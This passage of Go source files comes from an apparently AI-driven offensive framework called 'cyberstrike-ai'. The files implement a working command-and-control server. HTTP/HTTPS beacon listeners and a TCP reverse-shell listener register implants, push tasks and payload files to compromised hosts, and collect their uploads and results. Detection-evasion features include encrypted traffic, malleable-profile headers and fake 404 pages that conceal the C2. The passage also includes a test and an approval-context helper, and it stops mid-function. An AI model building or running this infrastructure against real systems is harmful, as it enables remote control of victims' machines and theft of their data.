// WithHITLRunContext 将 runCtx(通常为整条 Agent / SSE 请求生命周期)挂到传入的 ctx 上。
// MCP 工具 handler 收到的 ctx 可能是带单次工具超时的子 context,在工具 return 时会被 cancel
// 危险任务 HITL 应通过 HITLUserContext 使用 runCtx 等待人工审批。
func WithHITLRunContext(ctx, runCtx context.Context) context.Context {
if ctx == nil || runCtx == nil {
return ctx
}
return context.WithValue(ctx, hitlRunCtxKey{}, runCtx)
}
// HITLUserContext 返回用于 C2 危险任务 HITL 等待的 context
// 若曾用 WithHITLRunContext 注入更长寿命的 runCtx 则返回之,否则返回 ctx。
func HITLUserContext(ctx context.Context) context.Context {
if ctx == nil {
return context.Background()
}
if v := ctx.Value(hitlRunCtxKey{}); v != nil {
if run, ok := v.(context.Context); ok && run != nil {
return run
}
}
return ctx
}
+22
View File
@@ -0,0 +1,22 @@
package c2
import (
"encoding/base64"
"os"
)
// 这些薄封装存在的目的:
// - 让 manager.go / handler 中的逻辑更直观,避免反复 import os;
// - 便于将来用接口抽象(譬如改成 internal/storage 的实现)做单元测试。
func osMkdirAll(path string, perm os.FileMode) error {
return os.MkdirAll(path, perm)
}
func osWriteFile(path string, data []byte, perm os.FileMode) error {
return os.WriteFile(path, data, perm)
}
func base64Decode(s string) ([]byte, error) {
return base64.StdEncoding.DecodeString(s)
}
+69
View File
@@ -0,0 +1,69 @@
package c2
import (
"strings"
"sync"
"cyberstrike-ai/internal/database"
"go.uber.org/zap"
)
// Listener 监听器抽象:每种传输方式(TCP/HTTP/HTTPS/WS/DNS)都实现此接口;
// Manager 不感知具体实现细节,通过 ListenerRegistry 工厂创建。
type Listener interface {
// Type 返回当前 listener 的类型字符串(如 "tcp_reverse"
Type() string
// Start 启动监听;如果端口被占用应返回 ErrPortInUse
Start() error
// Stop 停止监听并释放所有相关 goroutine(不应抛 panic
Stop() error
}
// ListenerCreationCtx 工厂初始化 listener 时收到的上下文
type ListenerCreationCtx struct {
Listener *database.C2Listener
Config *ListenerConfig
Manager *Manager
Logger *zap.Logger
}
// ListenerFactory 创建 listener 实例的工厂;返回的实例尚未 Start
type ListenerFactory func(ctx ListenerCreationCtx) (Listener, error)
// ListenerRegistry 类型 → 工厂 的注册表,由 internal/app 启动时注册具体实现,
// 测试中也可注入 mock 工厂来覆盖。
type ListenerRegistry struct {
mu sync.RWMutex
factories map[string]ListenerFactory
}
// NewListenerRegistry 创建空注册表
func NewListenerRegistry() *ListenerRegistry {
return &ListenerRegistry{factories: make(map[string]ListenerFactory)}
}
// Register 注册一种 listener 工厂
func (r *ListenerRegistry) Register(typeName string, f ListenerFactory) {
r.mu.Lock()
defer r.mu.Unlock()
r.factories[strings.ToLower(strings.TrimSpace(typeName))] = f
}
// Get 取工厂;nil 表示未注册
func (r *ListenerRegistry) Get(typeName string) ListenerFactory {
r.mu.RLock()
defer r.mu.RUnlock()
return r.factories[strings.ToLower(strings.TrimSpace(typeName))]
}
// RegisteredTypes 列出已注册的类型,给前端枚举用
func (r *ListenerRegistry) RegisteredTypes() []string {
r.mu.RLock()
defer r.mu.RUnlock()
out := make([]string, 0, len(r.factories))
for k := range r.factories {
out = append(out, k)
}
return out
}
+549
View File
@@ -0,0 +1,549 @@
package c2
import (
"crypto/ecdsa"
"crypto/elliptic"
"crypto/rand"
"crypto/sha256"
"crypto/subtle"
"crypto/tls"
"crypto/x509"
"crypto/x509/pkix"
"encoding/base64"
"encoding/hex"
"encoding/json"
"encoding/pem"
"errors"
"fmt"
"io"
"math/big"
mrand "math/rand"
"net"
"net/http"
"os"
"path/filepath"
"strings"
"sync"
"time"
"cyberstrike-ai/internal/database"
"go.uber.org/zap"
)
// HTTPBeaconListener 实现 HTTP/HTTPS Beacon
// - beacon 端定期 POST {checkin_path}(携带 implant_token + AES 加密 body);
// - 服务端解密、登记会话、回执 sleep + 是否有任务;
// - beacon 收到 has_tasks=true 时 GET {tasks_path} 拉取加密任务列表;
// - 任务完成后 POST {result_path} 回传结果。
//
// 优势:所有任务异步、可批量、支持文件上传/截图/任意大 blob,是 C2 的"主战场"。
type HTTPBeaconListener struct {
rec *database.C2Listener
cfg *ListenerConfig
manager *Manager
logger *zap.Logger
useTLS bool
profile *database.C2Profile
srv *http.Server
mu sync.Mutex
stopCh chan struct{}
stopped bool
}
// NewHTTPBeaconListener 工厂(注册到 ListenerRegistry["http_beacon"]
func NewHTTPBeaconListener(ctx ListenerCreationCtx) (Listener, error) {
return &HTTPBeaconListener{
rec: ctx.Listener,
cfg: ctx.Config,
manager: ctx.Manager,
logger: ctx.Logger,
useTLS: false,
stopCh: make(chan struct{}),
}, nil
}
// NewHTTPSBeaconListener 工厂(注册到 ListenerRegistry["https_beacon"]
func NewHTTPSBeaconListener(ctx ListenerCreationCtx) (Listener, error) {
return &HTTPBeaconListener{
rec: ctx.Listener,
cfg: ctx.Config,
manager: ctx.Manager,
logger: ctx.Logger,
useTLS: true,
stopCh: make(chan struct{}),
}, nil
}
// Type 类型字符串
func (l *HTTPBeaconListener) Type() string {
if l.useTLS {
return string(ListenerTypeHTTPSBeacon)
}
return string(ListenerTypeHTTPBeacon)
}
// Start 起 HTTP server
func (l *HTTPBeaconListener) Start() error {
// Load Malleable Profile if configured
l.loadProfile()
mux := http.NewServeMux()
mux.HandleFunc(l.cfg.BeaconCheckInPath, l.withProfileHeaders(l.handleCheckIn))
mux.HandleFunc(l.cfg.BeaconTasksPath, l.withProfileHeaders(l.handleTasks))
mux.HandleFunc(l.cfg.BeaconResultPath, l.withProfileHeaders(l.handleResult))
mux.HandleFunc(l.cfg.BeaconUploadPath, l.withProfileHeaders(l.handleUpload))
mux.HandleFunc(l.cfg.BeaconFilePath, l.withProfileHeaders(l.handleFileServe))
addr := fmt.Sprintf("%s:%d", l.rec.BindHost, l.rec.BindPort)
l.srv = &http.Server{
Addr: addr,
Handler: mux,
ReadHeaderTimeout: 15 * time.Second,
ReadTimeout: 60 * time.Second,
WriteTimeout: 120 * time.Second,
IdleTimeout: 300 * time.Second,
}
ln, err := net.Listen("tcp", addr)
if err != nil {
if isAddrInUse(err) {
return ErrPortInUse
}
return err
}
if l.useTLS {
tlsConfig, err := l.buildTLSConfig()
if err != nil {
_ = ln.Close()
return fmt.Errorf("build TLS config: %w", err)
}
l.srv.TLSConfig = tlsConfig
go func() {
if err := l.srv.ServeTLS(ln, "", ""); err != nil && !errors.Is(err, http.ErrServerClosed) {
l.logger.Warn("https_beacon ServeTLS exited", zap.Error(err))
}
}()
} else {
go func() {
if err := l.srv.Serve(ln); err != nil && !errors.Is(err, http.ErrServerClosed) {
l.logger.Warn("http_beacon Serve exited", zap.Error(err))
}
}()
}
return nil
}
// Stop 关闭
func (l *HTTPBeaconListener) Stop() error {
l.mu.Lock()
if l.stopped {
l.mu.Unlock()
return nil
}
l.stopped = true
close(l.stopCh)
l.mu.Unlock()
if l.srv != nil {
ctx, cancel := contextWithTimeout(5 * time.Second)
defer cancel()
_ = l.srv.Shutdown(ctx)
}
return nil
}
// ----------------------------------------------------------------------------
// HTTP handlers
// ----------------------------------------------------------------------------
func (l *HTTPBeaconListener) handleCheckIn(w http.ResponseWriter, r *http.Request) {
if r.Method != http.MethodPost {
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
return
}
if !l.checkImplantToken(r) {
l.disguisedReject(w)
return
}
body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 1<<20))
if err != nil {
http.Error(w, "read failed", http.StatusBadRequest)
return
}
// 尝试 AES-GCM 解密(完整 beacon 二进制走加密通道)
var req ImplantCheckInRequest
plaintext, decErr := DecryptAESGCM(l.rec.EncryptionKey, string(body))
if decErr == nil {
if err := json.Unmarshal(plaintext, &req); err != nil {
l.disguisedReject(w)
return
}
} else {
// 解密失败:尝试当作明文 JSON(兼容 curl oneliner 等轻量级客户端)
if err := json.Unmarshal(body, &req); err != nil {
l.disguisedReject(w)
return
}
}
isPlaintext := decErr != nil
if req.UserAgent == "" {
req.UserAgent = r.UserAgent()
}
if req.SleepSeconds <= 0 {
req.SleepSeconds = l.cfg.DefaultSleep
}
// curl oneliner 可能不携带完整字段,用 remote IP + listener ID 生成稳定标识
host, _, _ := net.SplitHostPort(r.RemoteAddr)
if strings.TrimSpace(req.ImplantUUID) == "" {
// 基于 IP + listener ID 生成稳定 UUID,同一 IP 多次 check_in 复用同一会话
req.ImplantUUID = fmt.Sprintf("curl_%s_%s", host, shortHash(host+l.rec.ID))
}
if strings.TrimSpace(req.Hostname) == "" {
req.Hostname = "curl_" + host
}
if strings.TrimSpace(req.InternalIP) == "" {
req.InternalIP = host
}
if strings.TrimSpace(req.OS) == "" {
req.OS = "unknown"
}
if strings.TrimSpace(req.Arch) == "" {
req.Arch = "unknown"
}
session, err := l.manager.IngestCheckIn(l.rec.ID, req)
if err != nil {
http.Error(w, "ingest failed", http.StatusInternalServerError)
return
}
queued, _ := l.manager.DB().ListC2Tasks(database.ListC2TasksFilter{
SessionID: session.ID,
Status: string(TaskQueued),
Limit: 1,
})
resp := ImplantCheckInResponse{
SessionID: session.ID,
NextSleep: session.SleepSeconds,
NextJitter: session.JitterPercent,
HasTasks: len(queued) > 0,
ServerTime: time.Now().UnixMilli(),
}
if isPlaintext {
w.Header().Set("Content-Type", "application/json")
json.NewEncoder(w).Encode(resp)
} else {
l.writeEncrypted(w, resp)
}
}
func (l *HTTPBeaconListener) handleTasks(w http.ResponseWriter, r *http.Request) {
if r.Method != http.MethodGet {
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
return
}
if !l.checkImplantToken(r) {
l.disguisedReject(w)
return
}
sessionID := r.URL.Query().Get("session_id")
if sessionID == "" {
l.disguisedReject(w)
return
}
session, err := l.manager.DB().GetC2Session(sessionID)
if err != nil || session == nil {
l.disguisedReject(w)
return
}
envelopes, err := l.manager.PopTasksForBeacon(sessionID, 50)
if err != nil {
http.Error(w, "pop tasks failed", http.StatusInternalServerError)
return
}
if envelopes == nil {
envelopes = []TaskEnvelope{}
}
resp := map[string]interface{}{"tasks": envelopes}
if l.isPlaintextClient(r) {
w.Header().Set("Content-Type", "application/json")
json.NewEncoder(w).Encode(resp)
} else {
l.writeEncrypted(w, resp)
}
}
func (l *HTTPBeaconListener) handleResult(w http.ResponseWriter, r *http.Request) {
if r.Method != http.MethodPost {
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
return
}
if !l.checkImplantToken(r) {
l.disguisedReject(w)
return
}
body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 64<<20))
if err != nil {
http.Error(w, "read failed", http.StatusBadRequest)
return
}
var report TaskResultReport
plaintext, decErr := DecryptAESGCM(l.rec.EncryptionKey, string(body))
if decErr == nil {
if err := json.Unmarshal(plaintext, &report); err != nil {
l.disguisedReject(w)
return
}
} else {
if err := json.Unmarshal(body, &report); err != nil {
l.disguisedReject(w)
return
}
}
if err := l.manager.IngestTaskResult(report); err != nil {
http.Error(w, "ingest result failed", http.StatusInternalServerError)
return
}
resp := map[string]string{"ok": "1"}
if l.isPlaintextClient(r) {
w.Header().Set("Content-Type", "application/json")
json.NewEncoder(w).Encode(resp)
} else {
l.writeEncrypted(w, resp)
}
}
// handleUpload 实现 implant 主动上传文件给服务端(如 download 任务的二进制结果)。
// Body 为 AES-GCM 加密后的 base64,与 check-in/result 保持一致的安全策略。
func (l *HTTPBeaconListener) handleUpload(w http.ResponseWriter, r *http.Request) {
if r.Method != http.MethodPost {
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
return
}
if !l.checkImplantToken(r) {
l.disguisedReject(w)
return
}
taskID := r.URL.Query().Get("task_id")
if taskID == "" {
l.disguisedReject(w)
return
}
body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 256<<20))
if err != nil {
http.Error(w, "read failed", http.StatusBadRequest)
return
}
plaintext, err := DecryptAESGCM(l.rec.EncryptionKey, string(body))
if err != nil {
l.disguisedReject(w)
return
}
dir := filepath.Join(l.manager.StorageDir(), "uploads")
if err := os.MkdirAll(dir, 0o755); err != nil {
http.Error(w, "mkdir failed", http.StatusInternalServerError)
return
}
dst := filepath.Join(dir, taskID+".bin")
if err := os.WriteFile(dst, plaintext, 0o644); err != nil {
http.Error(w, "save failed", http.StatusInternalServerError)
return
}
l.writeEncrypted(w, map[string]interface{}{"ok": 1, "size": len(plaintext)})
}
// handleFileServe 实现服务端 → implant 的文件下发(upload 任务用)。
// 路径形如 /file/<task_id>,文件内容经 AES-GCM 加密后返回。
func (l *HTTPBeaconListener) handleFileServe(w http.ResponseWriter, r *http.Request) {
if r.Method != http.MethodGet {
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
return
}
if !l.checkImplantToken(r) {
l.disguisedReject(w)
return
}
prefix := l.cfg.BeaconFilePath
taskID := strings.TrimPrefix(r.URL.Path, prefix)
if taskID == "" || strings.Contains(taskID, "/") || strings.Contains(taskID, "\\") || strings.Contains(taskID, "..") {
l.disguisedReject(w)
return
}
fpath := filepath.Join(l.manager.StorageDir(), "downstream", taskID+".bin")
absPath, err := filepath.Abs(fpath)
if err != nil {
l.disguisedReject(w)
return
}
absDir, err := filepath.Abs(filepath.Join(l.manager.StorageDir(), "downstream"))
if err != nil || !strings.HasPrefix(absPath, absDir+string(filepath.Separator)) {
l.disguisedReject(w)
return
}
data, err := os.ReadFile(absPath)
if err != nil {
l.disguisedReject(w)
return
}
l.writeEncrypted(w, map[string]interface{}{
"file_data": base64Encode(data),
})
}
// ----------------------------------------------------------------------------
// 鉴权 / 输出辅助
// ----------------------------------------------------------------------------
// checkImplantToken 校验 X-Implant-Token header(恒定时间比较防止时序攻击)
func (l *HTTPBeaconListener) checkImplantToken(r *http.Request) bool {
got := r.Header.Get("X-Implant-Token")
if got == "" {
got = r.Header.Get("Cookie") // 兼容 Malleable Profile 用 Cookie 携带
}
expected := l.rec.ImplantToken
if got == "" || expected == "" {
return false
}
return subtle.ConstantTimeCompare([]byte(got), []byte(expected)) == 1
}
// disguisedReject 鉴权失败时返回 404,避免暴露 listener 是 C2
func (l *HTTPBeaconListener) disguisedReject(w http.ResponseWriter) {
w.Header().Set("Content-Type", "text/html; charset=utf-8")
w.WriteHeader(http.StatusNotFound)
_, _ = fmt.Fprint(w, "<html><body><h1>404 Not Found</h1></body></html>")
}
// writeEncrypted JSON 序列化 + AES-GCM 加密 + 写回
func (l *HTTPBeaconListener) writeEncrypted(w http.ResponseWriter, payload interface{}) {
body, err := json.Marshal(payload)
if err != nil {
http.Error(w, "encode failed", http.StatusInternalServerError)
return
}
enc, err := EncryptAESGCM(l.rec.EncryptionKey, body)
if err != nil {
http.Error(w, "encrypt failed", http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/octet-stream")
_, _ = w.Write([]byte(enc))
}
// loadProfile loads Malleable Profile from DB if the listener has a profile_id configured
func (l *HTTPBeaconListener) loadProfile() {
if l.rec.ProfileID == "" {
return
}
profile, err := l.manager.GetProfile(l.rec.ProfileID)
if err != nil || profile == nil {
l.logger.Warn("加载 Malleable Profile 失败,使用默认配置",
zap.String("profile_id", l.rec.ProfileID), zap.Error(err))
return
}
l.profile = profile
l.logger.Info("Malleable Profile 已加载",
zap.String("profile_id", profile.ID),
zap.String("profile_name", profile.Name),
zap.String("user_agent", profile.UserAgent))
}
// withProfileHeaders wraps a handler to inject Malleable Profile response headers
func (l *HTTPBeaconListener) withProfileHeaders(next http.HandlerFunc) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
if l.profile != nil && len(l.profile.ResponseHeaders) > 0 {
for k, v := range l.profile.ResponseHeaders {
w.Header().Set(k, v)
}
}
next(w, r)
}
}
// ----------------------------------------------------------------------------
// TLS 自签证书(仅供测试 / Phase 2 默认行为)
// ----------------------------------------------------------------------------
func (l *HTTPBeaconListener) buildTLSConfig() (*tls.Config, error) {
// 操作员显式提供证书 → 优先使用
if l.cfg.TLSCertPath != "" && l.cfg.TLSKeyPath != "" {
cert, err := tls.LoadX509KeyPair(l.cfg.TLSCertPath, l.cfg.TLSKeyPath)
if err == nil {
return &tls.Config{Certificates: []tls.Certificate{cert}, MinVersion: tls.VersionTLS12}, nil
}
l.logger.Warn("加载 TLS 证书失败,回退自签", zap.Error(err))
}
// 自签证书:CN 用 listener 名,避免重复
cert, err := generateSelfSignedCert(l.rec.Name)
if err != nil {
return nil, err
}
return &tls.Config{Certificates: []tls.Certificate{cert}, MinVersion: tls.VersionTLS12}, nil
}
func generateSelfSignedCert(cn string) (tls.Certificate, error) {
priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
if err != nil {
return tls.Certificate{}, err
}
serial, _ := rand.Int(rand.Reader, big.NewInt(1<<62))
tmpl := &x509.Certificate{
SerialNumber: serial,
Subject: pkix.Name{CommonName: cn},
NotBefore: time.Now().Add(-1 * time.Hour),
NotAfter: time.Now().Add(365 * 24 * time.Hour),
KeyUsage: x509.KeyUsageDigitalSignature,
ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
IPAddresses: []net.IP{net.ParseIP("127.0.0.1")},
DNSNames: []string{"localhost"},
}
der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &priv.PublicKey, priv)
if err != nil {
return tls.Certificate{}, err
}
keyDER, err := x509.MarshalECPrivateKey(priv)
if err != nil {
return tls.Certificate{}, err
}
certPEM := pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: der})
keyPEM := pem.EncodeToMemory(&pem.Block{Type: "EC PRIVATE KEY", Bytes: keyDER})
return tls.X509KeyPair(certPEM, keyPEM)
}
func base64Encode(data []byte) string {
return base64.StdEncoding.EncodeToString(data)
}
func shortHash(s string) string {
h := sha256.Sum256([]byte(s))
return hex.EncodeToString(h[:6])
}
// isPlaintextClient 判断请求是否来自明文客户端(curl oneliner 等)
// 完整 beacon 二进制会设置 Content-Type: application/octet-stream
func (l *HTTPBeaconListener) isPlaintextClient(r *http.Request) bool {
ct := r.Header.Get("Content-Type")
accept := r.Header.Get("Accept")
return strings.Contains(ct, "application/json") ||
strings.Contains(accept, "application/json") ||
strings.Contains(r.UserAgent(), "curl/")
}
// ApplyJitter 给定基础 sleep + jitter 百分比,返回随机抖动后的 duration
// 公开给 listener_websocket / payload 模板共用,避免重复实现
func ApplyJitter(baseSec, jitterPercent int) time.Duration {
if baseSec <= 0 {
return 0
}
if jitterPercent <= 0 {
return time.Duration(baseSec) * time.Second
}
if jitterPercent > 100 {
jitterPercent = 100
}
delta := mrand.Intn(2*jitterPercent+1) - jitterPercent // [-j, +j]
factor := 1.0 + float64(delta)/100.0
return time.Duration(float64(baseSec)*factor) * time.Second
}
+129
View File
@@ -0,0 +1,129 @@
package c2
import (
"bytes"
"encoding/json"
"io"
"net"
"net/http"
"path/filepath"
"strconv"
"strings"
"testing"
"time"
"cyberstrike-ai/internal/database"
"go.uber.org/zap"
)
// 集成验证:路由、鉴权伪装 404、明文 check-in JSON 回包。
func TestHTTPBeaconListener_CheckInMatrix(t *testing.T) {
tmp := t.TempDir()
dbPath := filepath.Join(tmp, "c2.sqlite")
db, err := database.NewDB(dbPath, zap.NewNop())
if err != nil {
t.Fatal(err)
}
t.Cleanup(func() { _ = db.Close() })
lnPick, err := net.Listen("tcp", "127.0.0.1:0")
if err != nil {
t.Fatal(err)
}
port := lnPick.Addr().(*net.TCPAddr).Port
_ = lnPick.Close()
keyB64, err := GenerateAESKey()
if err != nil {
t.Fatal(err)
}
token := "test-implant-token-fixed"
lid := "l_testhttpbeacon01"
rec := &database.C2Listener{
ID: lid,
Name: "t",
Type: string(ListenerTypeHTTPBeacon),
BindHost: "127.0.0.1",
BindPort: port,
EncryptionKey: keyB64,
ImplantToken: token,
Status: "stopped",
ConfigJSON: `{"beacon_check_in_path":"/check_in"}`,
CreatedAt: time.Now(),
}
if err := db.CreateC2Listener(rec); err != nil {
t.Fatal(err)
}
m := NewManager(db, zap.NewNop(), filepath.Join(tmp, "c2store"))
m.Registry().Register(string(ListenerTypeHTTPBeacon), NewHTTPBeaconListener)
if _, err := m.StartListener(lid); err != nil {
t.Fatal(err)
}
t.Cleanup(func() { _ = m.StopListener(lid) })
base := "http://127.0.0.1:" + strconv.Itoa(port)
client := &http.Client{Timeout: 5 * time.Second}
t.Run("wrong_path_go_default_404", func(t *testing.T) {
resp, err := client.Post(base+"/nope", "application/json", strings.NewReader(`{}`))
if err != nil {
t.Fatal(err)
}
defer resp.Body.Close()
b, _ := io.ReadAll(resp.Body)
if resp.StatusCode != http.StatusNotFound {
t.Fatalf("status=%d body=%q", resp.StatusCode, b)
}
if !strings.Contains(string(b), "404") || !strings.Contains(strings.ToLower(string(b)), "not found") {
t.Fatalf("unexpected body: %q", b)
}
})
t.Run("check_in_wrong_token_disguised_html_404", func(t *testing.T) {
req, _ := http.NewRequest(http.MethodPost, base+"/check_in", bytes.NewBufferString(`{"hostname":"h"}`))
req.Header.Set("X-Implant-Token", "wrong-token")
req.Header.Set("Content-Type", "application/json")
resp, err := client.Do(req)
if err != nil {
t.Fatal(err)
}
defer resp.Body.Close()
b, _ := io.ReadAll(resp.Body)
if resp.StatusCode != http.StatusNotFound {
t.Fatalf("status=%d", resp.StatusCode)
}
ct := resp.Header.Get("Content-Type")
if !strings.Contains(ct, "text/html") {
t.Fatalf("content-type=%q body=%q", ct, b)
}
if !strings.Contains(string(b), "404 Not Found") {
t.Fatalf("expected disguised HTML, got: %q", b)
}
})
t.Run("check_in_ok_plaintext_json", func(t *testing.T) {
body := `{"hostname":"n","username":"u","os":"Linux","arch":"amd64","internal_ip":"10.0.0.1","pid":42}`
req, _ := http.NewRequest(http.MethodPost, base+"/check_in", strings.NewReader(body))
req.Header.Set("X-Implant-Token", token)
req.Header.Set("Content-Type", "application/json")
resp, err := client.Do(req)
if err != nil {
t.Fatal(err)
}
defer resp.Body.Close()
b, _ := io.ReadAll(resp.Body)
if resp.StatusCode != http.StatusOK {
t.Fatalf("status=%d body=%s", resp.StatusCode, b)
}
var out ImplantCheckInResponse
if err := json.Unmarshal(b, &out); err != nil {
t.Fatalf("json: %v body=%s", err, b)
}
if out.SessionID == "" || out.NextSleep <= 0 {
t.Fatalf("bad response: %+v", out)
}
})
}
+439
View File
@@ -0,0 +1,439 @@
package c2
import (
"bufio"
"context"
"crypto/sha256"
"encoding/hex"
"fmt"
"io"
"net"
"regexp"
"strings"
"sync"
"sync/atomic"
"time"
"cyberstrike-ai/internal/database"
"go.uber.org/zap"
)
// TCPReverseListener 监听 TCP 端口,等待目标机反弹连接。
// 经典模式:纯交互式 raw shell,与 nc / bash -i >& /dev/tcp 兼容。
// 二进制 Beacon:连接后先发送魔数 CSB1,随后使用与 HTTP Beacon 相同的 AES-GCM JSON 语义(成帧见 tcp_beacon_server.go)。
// 每个新连接自动生成一个 implant_uuid(基于远端地址 + 启动时间 hash),登记为 c2_session
// 任务派发:使用同步 exec 模式 —— 收到 task 时直接 send 命令字节并读取输出(带结束标记)。
type TCPReverseListener struct {
rec *database.C2Listener
cfg *ListenerConfig
manager *Manager
logger *zap.Logger
mu sync.Mutex
listener net.Listener
stopCh chan struct{}
conns map[string]*tcpReverseConn // session_id → 连接
stopOnce sync.Once
}
// tcpReverseConn 单个反弹会话的运行时状态
type tcpReverseConn struct {
sessionID string
conn net.Conn
reader *bufio.Reader
writeMu sync.Mutex // 序列化 write,避免并发 task 写入
taskMode int32 // 原子标志: 0=空闲(handleConn读), 1=任务中(runTaskOnConn独占读)
}
// NewTCPReverseListener 工厂方法(注册到 ListenerRegistry["tcp_reverse"]
func NewTCPReverseListener(ctx ListenerCreationCtx) (Listener, error) {
return &TCPReverseListener{
rec: ctx.Listener,
cfg: ctx.Config,
manager: ctx.Manager,
logger: ctx.Logger,
stopCh: make(chan struct{}),
conns: make(map[string]*tcpReverseConn),
}, nil
}
// Type 返回类型常量
func (l *TCPReverseListener) Type() string { return string(ListenerTypeTCPReverse) }
// Start 启动 TCP 监听,accept 在独立 goroutine 中运行
func (l *TCPReverseListener) Start() error {
addr := fmt.Sprintf("%s:%d", l.rec.BindHost, l.rec.BindPort)
ln, err := net.Listen("tcp", addr)
if err != nil {
if isAddrInUse(err) {
return ErrPortInUse
}
return err
}
l.mu.Lock()
l.listener = ln
l.mu.Unlock()
go l.acceptLoop()
go l.taskDispatcherLoop()
return nil
}
// Stop 关闭监听 + 所有活动连接
func (l *TCPReverseListener) Stop() error {
l.stopOnce.Do(func() {
close(l.stopCh)
})
l.mu.Lock()
if l.listener != nil {
_ = l.listener.Close()
l.listener = nil
}
for sid, c := range l.conns {
_ = c.conn.Close()
delete(l.conns, sid)
}
l.mu.Unlock()
return nil
}
func (l *TCPReverseListener) acceptLoop() {
for {
l.mu.Lock()
ln := l.listener
l.mu.Unlock()
if ln == nil {
return
}
conn, err := ln.Accept()
if err != nil {
select {
case <-l.stopCh:
return
default:
}
if isClosedConnErr(err) {
return
}
l.logger.Warn("tcp_reverse accept 失败", zap.Error(err))
continue
}
go l.handleConn(conn)
}
}
// handleConn 一个连接=一个会话:先识别二进制 TCP Beacon(魔数 CSB1),否则走经典交互式 shell。
func (l *TCPReverseListener) handleConn(conn net.Conn) {
br := bufio.NewReader(conn)
_ = conn.SetReadDeadline(time.Now().Add(20 * time.Second))
prefix, err := br.Peek(4)
if err == nil && len(prefix) == 4 && string(prefix) == tcpBeaconMagic {
if _, err := br.Discard(4); err != nil {
_ = conn.Close()
return
}
_ = conn.SetReadDeadline(time.Time{})
l.handleTCPBeaconSession(conn, br)
return
}
_ = conn.SetReadDeadline(time.Time{})
l.handleShellConn(conn, br)
}
// handleShellConn 经典裸 TCP 反弹 shell(与 nc/bash /dev/tcp 兼容)。
func (l *TCPReverseListener) handleShellConn(conn net.Conn, br *bufio.Reader) {
remote := conn.RemoteAddr().String()
host, _, _ := net.SplitHostPort(remote)
// 用 listener+remote_ip 生成稳定 implant_uuid,使同一来源的重连复用同一会话
uuidSeed := fmt.Sprintf("%s|%s", l.rec.ID, host)
hash := sha256.Sum256([]byte(uuidSeed))
implantUUID := hex.EncodeToString(hash[:8])
checkin := ImplantCheckInRequest{
ImplantUUID: implantUUID,
Hostname: "tcp_" + host,
Username: "unknown",
OS: "unknown",
Arch: "unknown",
InternalIP: host,
SleepSeconds: 0, // 交互式不需要 sleep
JitterPercent: 0,
Metadata: map[string]interface{}{
"transport": "tcp_reverse",
"remote": remote,
},
}
session, err := l.manager.IngestCheckIn(l.rec.ID, checkin)
if err != nil {
l.logger.Warn("tcp_reverse 登记会话失败", zap.Error(err))
_ = conn.Close()
return
}
tc := &tcpReverseConn{
sessionID: session.ID,
conn: conn,
reader: br,
}
l.mu.Lock()
if old, exists := l.conns[session.ID]; exists {
_ = old.conn.Close()
}
l.conns[session.ID] = tc
l.mu.Unlock()
defer func() {
l.mu.Lock()
if cur, ok := l.conns[session.ID]; ok && cur == tc {
delete(l.conns, session.ID)
_ = l.manager.MarkSessionDead(session.ID)
}
l.mu.Unlock()
_ = conn.Close()
}()
// 主循环:检测连接存活 + 读取非任务期间的 unsolicited 输出
// 注意:必须统一使用 tc.reader 读取,避免与 runTaskOnConn 的 bufio.Reader 产生数据分裂
buf := make([]byte, 4096)
for {
select {
case <-l.stopCh:
return
default:
}
// 任务执行中,runTaskOnConn 独占读取权,主循环暂停
if atomic.LoadInt32(&tc.taskMode) == 1 {
time.Sleep(100 * time.Millisecond)
continue
}
_ = conn.SetReadDeadline(time.Now().Add(60 * time.Second))
n, err := tc.reader.Read(buf)
if n > 0 {
// 收到数据也刷新心跳
_ = l.manager.DB().TouchC2Session(session.ID, string(SessionActive), time.Now())
if atomic.LoadInt32(&tc.taskMode) == 0 {
l.manager.publishEvent("info", "task", session.ID, "",
"stdout(unsolicited)", map[string]interface{}{
"output": string(buf[:n]),
})
}
}
if err != nil {
if err == io.EOF || isClosedConnErr(err) {
return
}
if ne, ok := err.(net.Error); ok && ne.Timeout() {
// 读超时 = 连接仍存活但无数据,刷新心跳防止看门狗误判
_ = l.manager.DB().TouchC2Session(session.ID, string(SessionActive), time.Now())
continue
}
return
}
}
}
// taskDispatcherLoop 周期扫描所有活动会话的任务队列,下发 exec/shell 类型的同步命令
func (l *TCPReverseListener) taskDispatcherLoop() {
t := time.NewTicker(500 * time.Millisecond)
defer t.Stop()
for {
select {
case <-l.stopCh:
return
case <-t.C:
l.mu.Lock()
snapshot := make([]*tcpReverseConn, 0, len(l.conns))
for _, c := range l.conns {
snapshot = append(snapshot, c)
}
l.mu.Unlock()
for _, c := range snapshot {
envelopes, err := l.manager.PopTasksForBeacon(c.sessionID, 5)
if err != nil || len(envelopes) == 0 {
continue
}
for _, env := range envelopes {
go l.runTaskOnConn(c, env)
}
}
}
}
}
// runTaskOnConn 把一条 task 转成 raw shell 命令发送,通过结束标记读输出
func (l *TCPReverseListener) runTaskOnConn(c *tcpReverseConn, env TaskEnvelope) {
startedAt := NowUnixMillis()
cmd, ok := buildTCPCommand(TaskType(env.TaskType), env.Payload)
if !ok {
l.reportTaskResult(env.TaskID, startedAt, false, "", "tcp_reverse listener 不支持该任务类型: "+env.TaskType, "", "")
return
}
// 独占读取权:通知 handleConn 主循环暂停
atomic.StoreInt32(&c.taskMode, 1)
defer atomic.StoreInt32(&c.taskMode, 0)
// 等待 handleConn 循环退出读取(给 100ms 让正在进行的 Read 超时/完成)
time.Sleep(150 * time.Millisecond)
// 排空 buffer 中残留的 bash 提示符等数据
drainStaleData(c.reader, c.conn)
endMark := fmt.Sprintf("__C2_DONE_%s__", env.TaskID)
wrapped := fmt.Sprintf("%s\necho %s\n", strings.TrimSpace(cmd), endMark)
c.writeMu.Lock()
_ = c.conn.SetWriteDeadline(time.Now().Add(15 * time.Second))
